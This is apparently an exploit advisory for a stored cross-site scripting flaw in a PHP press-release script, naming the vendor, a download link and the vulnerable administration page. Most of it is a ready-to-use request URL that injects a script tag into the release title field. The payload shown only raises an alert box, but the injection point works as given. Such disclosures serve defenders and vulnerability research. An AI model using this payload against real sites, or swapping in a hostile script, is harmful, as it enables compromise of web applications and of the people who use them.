20 lines
No EOL
798 B
Text
20 lines
No EOL
798 B
Text
# Exploit Title : PHP Press Release* - Stored Cross Site
|
|
Scripting*
|
|
# Author : Besim
|
|
# Google Dork : -
|
|
# Date : 09/10/2016
|
|
# Type : webapps
|
|
# Platform : PHP
|
|
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
|
# Software link :
|
|
http://www.pagereactions.com/downloads/phppressrelease.zip
|
|
|
|
|
|
Description :
|
|
|
|
Vulnerable link :
|
|
http://site_name/phppressrelease/administration.php?pageaction=newrelease
|
|
|
|
Stored XSS Payload :
|
|
|
|
http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active |